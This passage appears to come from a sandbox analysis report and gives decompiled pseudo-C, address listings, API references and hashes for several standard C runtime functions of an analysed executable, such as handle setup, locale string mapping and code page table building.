                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 442123175-0
                                                                                                                                                                          • Opcode ID: 44c927b96b7f71b0b1476898b9b73e8bbb2fe1690fb08599582496ea26b2b263
                                                                                                                                                                          • Instruction ID: 6bcc765f38ea2a4176ba41e94d21b6fb9359e2ddb9ebccdd5eec45c07cd4d8cf
                                                                                                                                                                          • Opcode Fuzzy Hash: 44c927b96b7f71b0b1476898b9b73e8bbb2fe1690fb08599582496ea26b2b263
                                                                                                                                                                          • Instruction Fuzzy Hash: 30218234A002199FCB15DF6ADC80AEDB7BAEF8D301B1441A9EA46D7251D630ED42CF60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A05ECA Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 789 a05eca-a05ecf 790 a05ed1-a05ee9 789->790 791 a05ef7-a05f00 790->791 792 a05eeb-a05eef 790->792 794 a05f12 791->794 795 a05f02-a05f05 791->795 792->791 793 a05ef1-a05ef5 792->793 797 a05f70-a05f74 793->797 796 a05f14-a05f21 GetStdHandle 794->796 798 a05f07-a05f0c 795->798 799 a05f0e-a05f10 795->799 800 a05f30 796->800 801 a05f23-a05f25 796->801 797->790 802 a05f7a-a05f7d 797->802 798->796 799->796 804 a05f32-a05f34 800->804 801->800 803 a05f27-a05f2e GetFileType 801->803 803->804 805 a05f52-a05f64 804->805 806 a05f36-a05f3f 804->806 805->797 809 a05f66-a05f69 805->809 807 a05f41-a05f45 806->807 808 a05f47-a05f4a 806->808 807->797 808->797 810 a05f4c-a05f50 808->810 809->797 810->797
                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                          			E00A05ECA() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0xa46528 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0xa46398; // 0xb82fd8
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                                                                                                                                                          0x00a05ecf
                                                                                                                                                                          0x00a05ed1
                                                                                                                                                                          0x00a05ed5
                                                                                                                                                                          0x00a05ede
                                                                                                                                                                          0x00a05ee9
                                                                                                                                                                          0x00a05ef9
                                                                                                                                                                          0x00a05efd
                                                                                                                                                                          0x00a05f00
                                                                                                                                                                          0x00a05f12
                                                                                                                                                                          0x00a05f02
                                                                                                                                                                          0x00a05f05
                                                                                                                                                                          0x00a05f0e
                                                                                                                                                                          0x00a05f07
                                                                                                                                                                          0x00a05f0a
                                                                                                                                                                          0x00a05f0a
                                                                                                                                                                          0x00a05f05
                                                                                                                                                                          0x00a05f14
                                                                                                                                                                          0x00a05f1c
                                                                                                                                                                          0x00a05f21
                                                                                                                                                                          0x00a05f30
                                                                                                                                                                          0x00a05f27
                                                                                                                                                                          0x00a05f28
                                                                                                                                                                          0x00a05f28
                                                                                                                                                                          0x00a05f34
                                                                                                                                                                          0x00a05f52
                                                                                                                                                                          0x00a05f56
                                                                                                                                                                          0x00a05f5d
                                                                                                                                                                          0x00a05f64
                                                                                                                                                                          0x00a05f66
                                                                                                                                                                          0x00a05f69
                                                                                                                                                                          0x00a05f69
                                                                                                                                                                          0x00a05f36
                                                                                                                                                                          0x00a05f36
                                                                                                                                                                          0x00a05f39
                                                                                                                                                                          0x00a05f3f
                                                                                                                                                                          0x00a05f4a
                                                                                                                                                                          0x00a05f4c
                                                                                                                                                                          0x00a05f4c
                                                                                                                                                                          0x00a05f41
                                                                                                                                                                          0x00a05f41
                                                                                                                                                                          0x00a05f41
                                                                                                                                                                          0x00a05f3f
                                                                                                                                                                          0x00a05ef1
                                                                                                                                                                          0x00a05ef1
                                                                                                                                                                          0x00a05ef1
                                                                                                                                                                          0x00a05f70
                                                                                                                                                                          0x00a05f71
                                                                                                                                                                          0x00a05f7d

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00A05F16
                                                                                                                                                                          • GetFileType.KERNELBASE(00000000), ref: 00A05F28
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3000768030-0
                                                                                                                                                                          • Opcode ID: f4d3b4d0900e8f1841b07c67559432ac51d51a501fb9035fc7f0d80251aadf6c
                                                                                                                                                                          • Instruction ID: 49a6bef115f46ce517296c670915db5b751004269fa42c935ecb41ba40680420
                                                                                                                                                                          • Opcode Fuzzy Hash: f4d3b4d0900e8f1841b07c67559432ac51d51a501fb9035fc7f0d80251aadf6c
                                                                                                                                                                          • Instruction Fuzzy Hash: 3211B731D14F4A46C7348B7EACCC5237AA8AB96330B380719D1B6C65F1C739D9869E51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A06676 Relevance: 3.0, APIs: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                          			E00A06676(intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _t20;
				intOrPtr* _t22;

				_t22 = E00A061AC();
				if(_t22 == 0) {
					return LCMapStringW(E00A066D3(_a4, 0), _a8, _a12, _a16, _a20, _a24);
				}
				 *0xa1413c(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
				_t20 =  *_t22(); // executed
				return _t20;
			}





                                                                                                                                                                          0x00a06681
                                                                                                                                                                          0x00a06685
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a066c8
                                                                                                                                                                          0x00a066a4
                                                                                                                                                                          0x00a066aa
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • LCMapStringEx.KERNELBASE(?,00A072F9,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A066AA
                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00A072F9,?,?,00000000,?,00000000), ref: 00A066C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2568140703-0
                                                                                                                                                                          • Opcode ID: a7787faff84341201ff2ef882c70bde100bef0a40f2eb9eef13a6c7d36e37e14
                                                                                                                                                                          • Instruction ID: f9431aaa2ceed23a0f60703be406f7fcaf310e2275b3015b9c0bd84fb755cecb
                                                                                                                                                                          • Opcode Fuzzy Hash: a7787faff84341201ff2ef882c70bde100bef0a40f2eb9eef13a6c7d36e37e14
                                                                                                                                                                          • Instruction Fuzzy Hash: 93F0763240021EBBCF126F91ED05DDE3F26EF483A4F058110FA1826160CB37C972AB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0125F Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                          			E00A0125F(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0xa464b8 == 0) {
					_push(_t13);
					E00A0C1EA(__ebx); // executed
					_t2 = E00A0C4DE(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E00A012B2(__ebx, _t17);
						if(_t3 != 0) {
							 *0xa464c4 = _t3;
							_t14 = 0;
							 *0xa464b8 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E00A0447F(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E00A0447F(_t17);
					return _t14;
				} else {
					return 0;
				}
			}







                                                                                                                                                                          0x00a01266
                                                                                                                                                                          0x00a0126c
                                                                                                                                                                          0x00a0126d
                                                                                                                                                                          0x00a01272
                                                                                                                                                                          0x00a01277
                                                                                                                                                                          0x00a0127b
                                                                                                                                                                          0x00a01283
                                                                                                                                                                          0x00a0128b
                                                                                                                                                                          0x00a01292
                                                                                                                                                                          0x00a01297
                                                                                                                                                                          0x00a01299
                                                                                                                                                                          0x00a0128d
                                                                                                                                                                          0x00a0128d
                                                                                                                                                                          0x00a0128d
                                                                                                                                                                          0x00a012a0
                                                                                                                                                                          0x00a0127d
                                                                                                                                                                          0x00a0127d
                                                                                                                                                                          0x00a0127d
                                                                                                                                                                          0x00a012a7
                                                                                                                                                                          0x00a012b1
                                                                                                                                                                          0x00a01268
                                                                                                                                                                          0x00a0126a
                                                                                                                                                                          0x00a0126a

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 6404c7de8688862cda5979db5eea6461246081257b49083785e5ad8b6bb8f156
                                                                                                                                                                          • Instruction ID: ce2a136b3bbba56669140a02708978a526b9a05ee5945a6e7fb08bfeba2a1755
                                                                                                                                                                          • Opcode Fuzzy Hash: 6404c7de8688862cda5979db5eea6461246081257b49083785e5ad8b6bb8f156
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE02B36A0651886D731A73DBE423F917546BC7331F110336F924C61D5DF3048435062
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0BEB6 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                          			E00A0BEB6(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				signed int _t81;
				char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t91;

				_t88 = __edx;
				_t60 =  *0xa44bac; // 0x96877b9b
				_v8 = _t60 ^ _t91;
				_t90 = _a4;
				if( *(_t90 + 4) == 0xfde9) {
					L19:
					_t81 = 0;
					__eflags = 0;
					_t89 = 0x100;
					_t82 = 0;
					do {
						_t46 = _t82 - 0x61; // -97
						_t88 = _t46;
						_t47 = _t88 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t88 - 0x19;
							if(_t88 > 0x19) {
								_t63 = _t81;
							} else {
								 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000020;
								_t56 = _t82 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000010;
							_t52 = _t82 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *(_t90 + _t82 + 0x119) = _t63;
						_t82 = _t82 + 1;
						__eflags = _t82 - _t89;
					} while (_t82 < _t89);
					L26:
					return E009F8F7D(_t63, _t81, _v8 ^ _t91, _t88, _t89, _t90);
				}
				_t5 = _t90 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t81 = 0;
					_t89 = 0x100;
					_t68 = 0;
					do {
						 *((char*)(_t91 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t85 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t99 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t88 =  *(_t85 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t88;
							if(_t70 > _t88) {
								break;
							}
							__eflags = _t70 - _t89;
							if(_t70 >= _t89) {
								break;
							}
							 *((char*)(_t91 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t85 = _t85 + 2;
						__eflags = _t85;
						_t69 =  *_t85;
					}
					_t14 = _t90 + 4; // 0xe8458d00
					E00A0710A(_t99, _t81, 1,  &_v264, _t89,  &_v1800,  *_t14, _t81);
					_t17 = _t90 + 4; // 0xe8458d00
					_t20 = _t90 + 0x21c; // 0xffffffac
					E00A073F7(_t99, _t81,  *_t20, _t89,  &_v264, _t89,  &_v520, _t89,  *_t17, _t81); // executed
					_t22 = _t90 + 4; // 0xe8458d00
					_t24 = _t90 + 0x21c; // 0xffffffac
					E00A073F7(_t99, _t81,  *_t24, 0x200,  &_v264, _t89,  &_v776, _t89,  *_t22, _t81);
					_t80 = _t81;
					do {
						_t86 =  *(_t91 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								_t87 = _t81;
							} else {
								 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000020;
								_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x304));
							}
						} else {
							 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x204));
						}
						 *(_t90 + _t80 + 0x119) = _t87;
						_t80 = _t80 + 1;
					} while (_t80 < _t89);
					goto L26;
				}
			}




























                                                                                                                                                                          0x00a0beb6
                                                                                                                                                                          0x00a0bec1
                                                                                                                                                                          0x00a0bec8
                                                                                                                                                                          0x00a0becd
                                                                                                                                                                          0x00a0bed8
                                                                                                                                                                          0x00a0bfea
                                                                                                                                                                          0x00a0bfea
                                                                                                                                                                          0x00a0bfea
                                                                                                                                                                          0x00a0bfec
                                                                                                                                                                          0x00a0bff1
                                                                                                                                                                          0x00a0bff3
                                                                                                                                                                          0x00a0bff3
                                                                                                                                                                          0x00a0bff3
                                                                                                                                                                          0x00a0bff6
                                                                                                                                                                          0x00a0bff9
                                                                                                                                                                          0x00a0bffc
                                                                                                                                                                          0x00a0c008
                                                                                                                                                                          0x00a0c00b
                                                                                                                                                                          0x00a0c019
                                                                                                                                                                          0x00a0c00d
                                                                                                                                                                          0x00a0c010
                                                                                                                                                                          0x00a0c014
                                                                                                                                                                          0x00a0c014
                                                                                                                                                                          0x00a0c014
                                                                                                                                                                          0x00a0bffe
                                                                                                                                                                          0x00a0bffe
                                                                                                                                                                          0x00a0c003
                                                                                                                                                                          0x00a0c003
                                                                                                                                                                          0x00a0c003
                                                                                                                                                                          0x00a0c01b
                                                                                                                                                                          0x00a0c022
                                                                                                                                                                          0x00a0c023
                                                                                                                                                                          0x00a0c023
                                                                                                                                                                          0x00a0c027
                                                                                                                                                                          0x00a0c035
                                                                                                                                                                          0x00a0c035
                                                                                                                                                                          0x00a0bee5
                                                                                                                                                                          0x00a0bef0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bef6
                                                                                                                                                                          0x00a0bef6
                                                                                                                                                                          0x00a0bef8
                                                                                                                                                                          0x00a0befd
                                                                                                                                                                          0x00a0beff
                                                                                                                                                                          0x00a0beff
                                                                                                                                                                          0x00a0bf06
                                                                                                                                                                          0x00a0bf07
                                                                                                                                                                          0x00a0bf0b
                                                                                                                                                                          0x00a0bf11
                                                                                                                                                                          0x00a0bf17
                                                                                                                                                                          0x00a0bf3f
                                                                                                                                                                          0x00a0bf3f
                                                                                                                                                                          0x00a0bf41
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bf20
                                                                                                                                                                          0x00a0bf24
                                                                                                                                                                          0x00a0bf36
                                                                                                                                                                          0x00a0bf36
                                                                                                                                                                          0x00a0bf38
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bf29
                                                                                                                                                                          0x00a0bf2b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bf2d
                                                                                                                                                                          0x00a0bf35
                                                                                                                                                                          0x00a0bf35
                                                                                                                                                                          0x00a0bf35
                                                                                                                                                                          0x00a0bf3a
                                                                                                                                                                          0x00a0bf3a
                                                                                                                                                                          0x00a0bf3d
                                                                                                                                                                          0x00a0bf3d
                                                                                                                                                                          0x00a0bf44
                                                                                                                                                                          0x00a0bf59
                                                                                                                                                                          0x00a0bf5f
                                                                                                                                                                          0x00a0bf73
                                                                                                                                                                          0x00a0bf7a
                                                                                                                                                                          0x00a0bf89
                                                                                                                                                                          0x00a0bf9b
                                                                                                                                                                          0x00a0bfa2
                                                                                                                                                                          0x00a0bfaa
                                                                                                                                                                          0x00a0bfac
                                                                                                                                                                          0x00a0bfac
                                                                                                                                                                          0x00a0bfb7
                                                                                                                                                                          0x00a0bfc7
                                                                                                                                                                          0x00a0bfca
                                                                                                                                                                          0x00a0bfda
                                                                                                                                                                          0x00a0bfcc
                                                                                                                                                                          0x00a0bfcc
                                                                                                                                                                          0x00a0bfd1
                                                                                                                                                                          0x00a0bfd1
                                                                                                                                                                          0x00a0bfb9
                                                                                                                                                                          0x00a0bfb9
                                                                                                                                                                          0x00a0bfbe
                                                                                                                                                                          0x00a0bfbe
                                                                                                                                                                          0x00a0bfdc
                                                                                                                                                                          0x00a0bfe3
                                                                                                                                                                          0x00a0bfe4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0bfe8

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 00A0BEE8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1807457897-0
                                                                                                                                                                          • Opcode ID: 2f4fef5a67db31cfac97ec1c81fec0f6e93e28e6f2b32ece6779078605297c60
                                                                                                                                                                          • Instruction ID: f5bcae0c3330786f0873c1c75260519cce0cb222da9db679cc2b317992c291da
                                                                                                                                                                          • Opcode Fuzzy Hash: 2f4fef5a67db31cfac97ec1c81fec0f6e93e28e6f2b32ece6779078605297c60
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A4106B150424D9ADB218B18DE94BFABBFEEB45704F2404ACE58A870C2D375EA45DF60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F7BC5 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                          			E009F7BC5(void* __ecx, signed int __edx, void* __esi, signed int _a4) {
				signed int _v8;
				char _v40;
				char _v43;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				signed int _t32;
				signed int _t34;
				signed int _t38;
				signed int _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t67;
				void* _t68;
				signed int _t72;
				void* _t73;
				signed int* _t74;
				signed int _t75;

				_t69 = __esi;
				_t67 = __edx;
				_t32 =  *0xa44bac; // 0x96877b9b
				_v8 = _t32 ^ _t75;
				_t54 = _a4;
				_t68 = __ecx;
				if(_t54 != 0xffffffff) {
					_t34 =  *(__ecx + 0x20);
					_push(__esi);
					_t56 =  *_t34;
					__eflags = _t56;
					if(_t56 == 0) {
						L5:
						__eflags =  *(_t68 + 0x4c);
						if( *(_t68 + 0x4c) == 0) {
							L18:
							_t35 = _t34 | 0xffffffff;
							__eflags = _t34 | 0xffffffff;
							L19:
							_pop(_t69);
							L20:
							return E009F8F7D(_t35, _t54, _v8 ^ _t75, _t67, _t68, _t69);
						}
						E009F7A3C(_t68);
						_t38 =  *(_t68 + 0x38);
						_t60 = _t54;
						_v48 = _t38;
						__eflags = _t38;
						if(__eflags != 0) {
							_v44 = _t60;
							 *0xa1413c(_t68 + 0x40,  &_v44,  &_v43,  &_v56,  &_v40,  &_v8,  &_v52);
							_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 0x1c))))();
							__eflags = _t49;
							if(_t49 == 0) {
								L14:
								_t72 = _v52 -  &_v40;
								__eflags = _t72;
								if(_t72 == 0) {
									L16:
									_t34 =  &_v44;
									 *((char*)(_t68 + 0x3d)) = 1;
									__eflags = _v56 - _t34;
									if(_v56 == _t34) {
										goto L18;
									}
									L17:
									_t35 = _t54;
									goto L19;
								}
								_t34 = E009FFCB7(_t54, _t68, _t72,  &_v40, 1, _t72,  *(_t68 + 0x4c));
								__eflags = _t72 - _t34;
								if(_t72 != _t34) {
									goto L18;
								}
								goto L16;
							}
							_t51 = _t49 - 1;
							__eflags = _t51;
							if(_t51 == 0) {
								goto L14;
							}
							_t34 = _t51;
							__eflags = _t34;
							if(__eflags != 0) {
								goto L18;
							}
							_push( *(_t68 + 0x4c));
							_push(_v44);
							L12:
							_t53 = E009F72A7(__eflags); // executed
							__eflags = _t53;
							if(_t53 == 0) {
								_t54 = _t54 | 0xffffffff;
							}
							goto L17;
						}
						_push( *(_t68 + 0x4c));
						_push(_t60);
						goto L12;
					}
					_t67 =  *(__ecx + 0x30);
					_t73 =  *_t67;
					_t34 = _t73 + _t56;
					__eflags = _t56 - _t34;
					if(_t56 >= _t34) {
						goto L5;
					}
					 *_t67 = _t73 - 1;
					_t67 =  *(__ecx + 0x20);
					_t74 =  *_t67;
					 *_t67 =  &(_t74[0]);
					 *_t74 = _t54;
					goto L17;
				}
				_t35 = 0;
				goto L20;
			}



























                                                                                                                                                                          0x009f7bc5
                                                                                                                                                                          0x009f7bc5
                                                                                                                                                                          0x009f7bcb
                                                                                                                                                                          0x009f7bd2
                                                                                                                                                                          0x009f7bd6
                                                                                                                                                                          0x009f7bda
                                                                                                                                                                          0x009f7bdf
                                                                                                                                                                          0x009f7be8
                                                                                                                                                                          0x009f7beb
                                                                                                                                                                          0x009f7bec
                                                                                                                                                                          0x009f7bee
                                                                                                                                                                          0x009f7bf0
                                                                                                                                                                          0x009f7c14
                                                                                                                                                                          0x009f7c14
                                                                                                                                                                          0x009f7c18
                                                                                                                                                                          0x009f7cbb
                                                                                                                                                                          0x009f7cbb
                                                                                                                                                                          0x009f7cbb
                                                                                                                                                                          0x009f7cbe
                                                                                                                                                                          0x009f7cbe
                                                                                                                                                                          0x009f7cbf
                                                                                                                                                                          0x009f7ccc
                                                                                                                                                                          0x009f7ccc
                                                                                                                                                                          0x009f7c20
                                                                                                                                                                          0x009f7c25
                                                                                                                                                                          0x009f7c28
                                                                                                                                                                          0x009f7c2a
                                                                                                                                                                          0x009f7c2d
                                                                                                                                                                          0x009f7c2f
                                                                                                                                                                          0x009f7c37
                                                                                                                                                                          0x009f7c5d
                                                                                                                                                                          0x009f7c68
                                                                                                                                                                          0x009f7c68
                                                                                                                                                                          0x009f7c6b
                                                                                                                                                                          0x009f7c8e
                                                                                                                                                                          0x009f7c94
                                                                                                                                                                          0x009f7c94
                                                                                                                                                                          0x009f7c96
                                                                                                                                                                          0x009f7cab
                                                                                                                                                                          0x009f7cab
                                                                                                                                                                          0x009f7cae
                                                                                                                                                                          0x009f7cb2
                                                                                                                                                                          0x009f7cb5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7cb7
                                                                                                                                                                          0x009f7cb7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7cb7
                                                                                                                                                                          0x009f7c9f
                                                                                                                                                                          0x009f7ca7
                                                                                                                                                                          0x009f7ca9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f7ca9
